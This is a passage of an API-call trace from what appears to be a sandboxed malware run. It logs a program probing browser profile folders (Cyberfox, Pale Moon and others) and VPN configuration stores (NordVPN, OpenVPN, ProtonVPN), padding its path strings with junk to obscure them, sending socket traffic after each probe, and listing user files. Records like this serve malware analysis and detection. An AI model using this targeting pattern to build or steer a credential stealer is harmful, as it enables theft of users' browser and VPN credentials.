lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Comodo\\IceDragon", lpFilePart=0x0) returned 0x33 [0281.046] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Comodo\\IceDragon\\*", lpFindFileData=0x43e864 | out: lpFindFileData=0x43e864*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e824) returned 1 [0281.048] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.048] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\8pecxstudios\\Cyberfox", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\8pecxstudios\\Cyberfox") returned 0x39 [0281.048] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eab4) returned 1 [0281.048] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\8pecxstudios\\Cyberfox", nBufferLength=0x105, lpBuffer=0x43e594, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\8pecxstudios\\Cyberfox", lpFilePart=0x0) returned 0x38 [0281.049] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\*", lpFindFileData=0x43e864 | out: lpFindFileData=0x43e864*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.049] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e824) returned 1 [0281.050] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.050] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw") returned 0x41 [0281.051] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eab4) returned 1 [0281.051] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw", nBufferLength=0x105, lpBuffer=0x43e594, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw", lpFilePart=0x0) returned 0x40 [0281.051] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw\\*", lpFindFileData=0x43e864 | out: lpFindFileData=0x43e864*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e824) returned 1 [0281.052] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.052] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Moonchild Productions\\Pale Moon", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Moonchild Productions\\Pale Moon") returned 0x43 [0281.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eab4) returned 1 [0281.053] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Moonchild Productions\\Pale Moon", nBufferLength=0x105, lpBuffer=0x43e594, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Moonchild Productions\\Pale Moon", lpFilePart=0x0) returned 0x42 [0281.053] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\*", lpFindFileData=0x43e864 | out: lpFindFileData=0x43e864*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e824) returned 1 [0281.057] CoCreateGuid (in: pguid=0x43e868 | out: pguid=0x43e868*(Data1=0x42b513ae, Data2=0xcb2d, Data3=0x4e82, Data4=([0]=0x8a, [1]=0x3f, [2]=0x91, [3]=0x88, [4]=0xfe, [5]=0x2, [6]=0xf0, [7]=0x1b))) returned 0x0 [0281.057] CoCreateGuid (in: pguid=0x43e7ac | out: pguid=0x43e7ac*(Data1=0xe2fe4262, Data2=0xb522, Data3=0x424d, Data4=([0]=0xa7, [1]=0xd7, [2]=0x1a, [3]=0xe7, [4]=0xd2, [5]=0xc5, [6]=0x85, [7]=0xc7))) returned 0x0 [0281.071] send (s=0x264, buf=0x36b9edf*, len=171, flags=0) returned 171 [0281.071] recv (in: s=0x264, buf=0x267e0bc, len=8192, flags=0 | out: buf=0x267e0bc*) returned 128 [0281.255] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43ea3c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.255] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local", lpDst=0x43ea3c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x21 [0281.256] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NordVPN", nBufferLength=0x105, lpBuffer=0x43e660, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\NordVPN", lpFilePart=0x0) returned 0x28 [0281.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e8d4) returned 1 [0281.256] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NordVPN" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\nordvpn"), fInfoLevelId=0x0, lpFileInformation=0x2962fac | out: lpFileInformation=0x2962fac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0281.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8d0) returned 1 [0281.258] CoCreateGuid (in: pguid=0x43e86c | out: pguid=0x43e86c*(Data1=0x4d06e3c3, Data2=0xb47f, Data3=0x43b5, Data4=([0]=0x83, [1]=0x2c, [2]=0xba, [3]=0xbe, [4]=0x38, [5]=0x5a, [6]=0xb8, [7]=0x80))) returned 0x0 [0281.258] CoCreateGuid (in: pguid=0x43e7b0 | out: pguid=0x43e7b0*(Data1=0x21fe9415, Data2=0x7287, Data3=0x41c7, Data4=([0]=0xb7, [1]=0x7c, [2]=0xf2, [3]=0xab, [4]=0x65, [5]=0xcc, [6]=0xcd, [7]=0xca))) returned 0x0 [0281.258] send (s=0x264, buf=0x36b9edf*, len=178, flags=0) returned 178 [0281.259] recv (in: s=0x264, buf=0x267e0bc, len=8192, flags=0 | out: buf=0x267e0bc*) returned 128 [0281.284] ExpandEnvironmentStringsW (in: lpSrc="%USERPFile.WriteROFILE%", lpDst=0x43ea10, nSize=0x64 | out: lpDst="%USERPFile.WriteROFILE%") returned 0x18 [0281.284] ExpandEnvironmentStringsW (in: lpSrc="%USERPFile.WriteROFILE%\\AppFile.WriteData\\RoamiFile.Writeng", lpDst=0x43ea10, nSize=0x64 | out: lpDst="%USERPFile.WriteROFILE%\\AppFile.WriteData\\RoamiFile.Writeng") returned 0x3c [0281.313] GetFullPathNameW (in: lpFileName="%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", nBufferLength=0x105, lpBuffer=0x43e66c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", lpFilePart=0x0) returned 0x5b [0281.313] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", lpszLongPath=0x43e658, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0281.314] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect", lpszLongPath=0x43e620, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0281.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eb3c) returned 1 [0281.315] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x43e608, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13 [0281.316] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", nBufferLength=0x105, lpBuffer=0x43e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", lpFilePart=0x0) returned 0x5c [0281.316] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles\\*ovpn", lpFindFileData=0x43e8ec | out: lpFindFileData=0x43e8ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8ac) returned 1 [0281.323] CoCreateGuid (in: pguid=0x43e86c | out: pguid=0x43e86c*(Data1=0xdf8e4b26, Data2=0xb342, Data3=0x4229, Data4=([0]=0x83, [1]=0x98, [2]=0xbf, [3]=0x7a, [4]=0x50, [5]=0x8a, [6]=0xbe, [7]=0x91))) returned 0x0 [0281.323] CoCreateGuid (in: pguid=0x43e7b0 | out: pguid=0x43e7b0*(Data1=0xdb1f4cdf, Data2=0xce34, Data3=0x4df6, Data4=([0]=0xad, [1]=0x0, [2]=0xb9, [3]=0xc3, [4]=0x3a, [5]=0xd3, [6]=0xcb, [7]=0x36))) returned 0x0 [0281.324] send (s=0x264, buf=0x36b9edf*, len=167, flags=0) returned 167 [0281.324] recv (in: s=0x264, buf=0x267e0bc, len=8192, flags=0 | out: buf=0x267e0bc*) returned 128 [0281.355] ExpandEnvironmentStringsW (in: lpSrc="%USERPserviceInterface.ExtensionROFILE%", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="%USERPserviceInterface.ExtensionROFILE%") returned 0x28 [0281.355] ExpandEnvironmentStringsW (in: lpSrc="%USERPserviceInterface.ExtensionROFILE%\\ApserviceInterface.ExtensionpData\\LocaserviceInterface.Extensionl", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="%USERPserviceInterface.ExtensionROFILE%\\ApserviceInterface.ExtensionpData\\LocaserviceInterface.ExteC갢") returned 0x6a [0281.355] ExpandEnvironmentStringsW (in: lpSrc="%USERPserviceInterface.ExtensionROFILE%\\ApserviceInterface.ExtensionpData\\LocaserviceInterface.Extensionl", lpDst=0x43ea10, nSize=0x6a | out: lpDst="%USERPserviceInterface.ExtensionROFILE%\\ApserviceInterface.ExtensionpData\\LocaserviceInterface.Extensionl") returned 0x6a [0281.355] GetFullPathNameW (in: lpFileName="%USERPROFILE%\\AppData\\Local\\ProtonVPN", nBufferLength=0x105, lpBuffer=0x43e66c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local\\ProtonVPN", lpFilePart=0x0) returned 0x4a [0281.356] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local\\ProtonVPN", lpszLongPath=0x43e658, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0281.356] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local", lpszLongPath=0x43e61c, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0281.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eb3c) returned 1 [0281.356] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x43e608, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13 [0281.357] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local\\ProtonVPN", nBufferLength=0x105, lpBuffer=0x43e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local\\ProtonVPN", lpFilePart=0x0) returned 0x4b [0281.357] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local\\ProtonVPN\\*ovpn", lpFindFileData=0x43e8ec | out: lpFindFileData=0x43e8ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.357] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8ac) returned 1 [0281.362] CoCreateGuid (in: pguid=0x43e86c | out: pguid=0x43e86c*(Data1=0x5807d60c, Data2=0x4bd9, Data3=0x4a93, Data4=([0]=0xa8, [1]=0xc6, [2]=0x9c, [3]=0x7c, [4]=0xf1, [5]=0x5c, [6]=0x8e, [7]=0xa5))) returned 0x0 [0281.362] CoCreateGuid (in: pguid=0x43e7b0 | out: pguid=0x43e7b0*(Data1=0xd20baef9, Data2=0xddd9, Data3=0x4095, Data4=([0]=0x91, [1]=0xcc, [2]=0x1f, [3]=0x40, [4]=0x59, [5]=0x33, [6]=0x36, [7]=0x1e))) returned 0x0 [0281.363] send (s=0x264, buf=0x36b9edf*, len=167, flags=0) returned 167 [0281.364] recv (in: s=0x264, buf=0x267e0bc, len=8192, flags=0 | out: buf=0x267e0bc*) returned 128 [0281.441] CoTaskMemAlloc (cb=0x20c) returned 0x572efd8 [0281.441] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x572efd8 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0281.441] CoTaskMemFree (pv=0x572efd8) [0281.441] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x43e56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0281.441] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea64) returned 1 [0281.441] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x43e544, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0281.442] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\*", lpFindFileData=0x43e814 | out: lpFindFileData=0x43e814*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc2889e40, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xc2889e40, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.442] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc2889e40, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xc2889e40, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.442] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9923a90, ftCreationTime.dwHighDateTime=0x1d7d9e9, ftLastAccessTime.dwLowDateTime=0xbc84ca60, ftLastAccessTime.dwHighDateTime=0x1d7dca6, ftLastWriteTime.dwLowDateTime=0xbc84ca60, ftLastWriteTime.dwHighDateTime=0x1d7dca6, nFileSizeHigh=0x0, nFileSizeLow=0x5b84, dwReserved0=0x0, dwReserved1=0x0, cFileName="0TUcoykzt9i4cVI7E.mp4", cAlternateFileName="0TUCOY~1.MP4")) returned 1 [0281.442] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28117600, ftCreationTime.dwHighDateTime=0x1d7e32f, ftLastAccessTime.dwLowDateTime=0x44463f30, ftLastAccessTime.dwHighDateTime=0x1d7e367, ftLastWriteTime.dwLowDateTime=0x44463f30, ftLastWriteTime.dwHighDateTime=0x1d7e367, nFileSizeHigh=0x0, nFileSizeLow=0x3440, dwReserved0=0x0, dwReserved1=0x0, cFileName="3gfYe.gif", cAlternateFileName="")) returned 1 [0281.442] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa97aaa70, ftCreationTime.dwHighDateTime=0x1d7e54d, ftLastAccessTime.dwLowDateTime=0xf0182920, ftLastAccessTime.dwHighDateTime=0x1d7e6c5, ftLastWriteTime.dwLowDateTime=0xf0182920, ftLastWriteTime.dwHighDateTime=0x1d7e6c5, nFileSizeHigh=0x0, nFileSizeLow=0x18387, dwReserved0=0x0, dwReserved1=0x0, cFileName="4GQV.wav", cAlternateFileName="")) returned 1 [0281.442] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6486b730, ftCreationTime.dwHighDateTime=0x1d7db3c, ftLastAccessTime.dwLowDateTime=0x28c8d800, ftLastAccessTime.dwHighDateTime=0x1d7e504, ftLastWriteTime.dwLowDateTime=0x28c8d800, ftLastWriteTime.dwHighDateTime=0x1d7e504, nFileSizeHigh=0x0, nFileSizeLow=0x11b9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="7u touSvSeCy4 CVh7.bmp", cAlternateFileName="7UTOUS~1.BMP")) returned 1 [0281.442] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac0bdd80, ftCreationTime.dwHighDateTime=0x1d7df77, ftLastAccessTime.dwLowDateTime=0x8139f100, ftLastAccessTime.dwHighDateTime=0x1d7e33c, ftLastWriteTime.dwLowDateTime=0x8139f100, ftLastWriteTime.dwHighDateTime=0x1d7e33c, nFileSizeHigh=0x0, nFileSizeLow=0x16316, dwReserved0=0x0, dwReserved1=0x0, cFileName="8Zr5dm561R6yF-N.flv", cAlternateFileName="8ZR5DM~1.FLV")) returned 1 [0281.442] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c4313b0, ftCreationTime.dwHighDateTime=0x1d7e479, ftLastAccessTime.dwLowDateTime=0xb46cd460, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xb46cd460, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x81a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="97tgdA56mbkw.jpg", cAlternateFileName="97TGDA~1.JPG")) returned 1 [0281.442] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa389970, ftCreationTime.dwHighDateTime=0x1d7dd07, ftLastAccessTime.dwLowDateTime=0x93cc2d20, ftLastAccessTime.dwHighDateTime=0x1d7e00c, ftLastWriteTime.dwLowDateTime=0x93cc2d20, ftLastWriteTime.dwHighDateTime=0x1d7e00c, nFileSizeHigh=0x0, nFileSizeLow=0xfe62, dwReserved0=0x0, dwReserved1=0x0, cFileName="9oNuudsUMF.mp3", cAlternateFileName="9ONUUD~1.MP3")) returned 1 [0281.442] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f89bc0, ftCreationTime.dwHighDateTime=0x1d7dd42, ftLastAccessTime.dwLowDateTime=0xeb020120, ftLastAccessTime.dwHighDateTime=0x1d7e6c2, ftLastWriteTime.dwLowDateTime=0xeb020120, ftLastWriteTime.dwHighDateTime=0x1d7e6c2, nFileSizeHigh=0x0, nFileSizeLow=0x14988, dwReserved0=0x0, dwReserved1=0x0, cFileName="Blakmx5cf.bmp", cAlternateFileName="BLAKMX~1.BMP")) returned 1 [0281.442] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58822e50, ftCreationTime.dwHighDateTime=0x1d7e506, ftLastAccessTime.dwLowDateTime=0x26367ad0, ftLastAccessTime.dwHighDateTime=0x1d7e5a8, ftLastWriteTime.dwLowDateTime=0x26367ad0, ftLastWriteTime.dwHighDateTime=0x1d7e5a8, nFileSizeHigh=0x0, nFileSizeLow=0xdadf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bmqj.ots", cAlternateFileName="")) returned 1 [0281.442] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xe03daea9, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0xe03daea9, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0xb36110, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x45800, dwReserved0=0x0, dwReserved1=0x0, cFileName="cdieedr", cAlternateFileName="")) returned 1 [0281.442] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2226850, ftCreationTime.dwHighDateTime=0x1d7d7e2, ftLastAccessTime.dwLowDateTime=0xc5cfb040, ftLastAccessTime.dwHighDateTime=0x1d7e22c, ftLastWriteTime.dwLowDateTime=0xc5cfb040, ftLastWriteTime.dwHighDateTime=0x1d7e22c, nFileSizeHigh=0x0, nFileSizeLow=0x8e47, dwReserved0=0x0, dwReserved1=0x0, cFileName="djB2F.mp3", cAlternateFileName="")) returned 1 [0281.442] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8f6490, ftCreationTime.dwHighDateTime=0x1d7de21, ftLastAccessTime.dwLowDateTime=0x79a5fe00, ftLastAccessTime.dwHighDateTime=0x1d7e258, ftLastWriteTime.dwLowDateTime=0x79a5fe00, ftLastWriteTime.dwHighDateTime=0x1d7e258, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="DV6nAgU9wwwy.gif", cAlternateFileName="DV6NAG~1.GIF")) returned 1 [0281.443] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9607af90, ftCreationTime.dwHighDateTime=0x1d7e6ee, ftLastAccessTime.dwLowDateTime=0x9de64b50, ftLastAccessTime.dwHighDateTime=0x1d7e77e, ftLastWriteTime.dwLowDateTime=0x9de64b50, ftLastWriteTime.dwHighDateTime=0x1d7e77e, nFileSizeHigh=0x0, nFileSizeLow=0x30df, dwReserved0=0x0, dwReserved1=0x0, cFileName="EU5_6pxHq.bmp", cAlternateFileName="EU5_6P~1.BMP")) returned 1 [0281.443] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ac5d7c0, ftCreationTime.dwHighDateTime=0x1d7e4ef, ftLastAccessTime.dwLowDateTime=0xfb5314d0, ftLastAccessTime.dwHighDateTime=0x1d7e51c, ftLastWriteTime.dwLowDateTime=0xfb5314d0, ftLastWriteTime.dwHighDateTime=0x1d7e51c, nFileSizeHigh=0x0, nFileSizeLow=0x3473, dwReserved0=0x0, dwReserved1=0x0, cFileName="fjvFtSGmOO6qqt.mp4", cAlternateFileName="FJVFTS~1.MP4")) returned 1 [0281.443] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95275910, ftCreationTime.dwHighDateTime=0x1d7e048, ftLastAccessTime.dwLowDateTime=0x27eb6e60, ftLastAccessTime.dwHighDateTime=0x1d7e6c7, ftLastWriteTime.dwLowDateTime=0x27eb6e60, ftLastWriteTime.dwHighDateTime=0x1d7e6c7, nFileSizeHigh=0x0, nFileSizeLow=0x1d90, dwReserved0=0x0, dwReserved1=0x0, cFileName="fKZVRULqdlMALhdlRQ.gif", cAlternateFileName="FKZVRU~1.GIF")) returned 1 [0281.443] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf30404f0, ftCreationTime.dwHighDateTime=0x1d7ddf2, ftLastAccessTime.dwLowDateTime=0xf363a380, ftLastAccessTime.dwHighDateTime=0x1d7ded6, ftLastWriteTime.dwLowDateTime=0xf363a380, ftLastWriteTime.dwHighDateTime=0x1d7ded6, nFileSizeHigh=0x0, nFileSizeLow=0xfaa3, dwReserved0=0x0, dwReserved1=0x0, cFileName="g-vZ sPQr.swf", cAlternateFileName="G-VZSP~1.SWF")) returned 1 [0281.443] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, 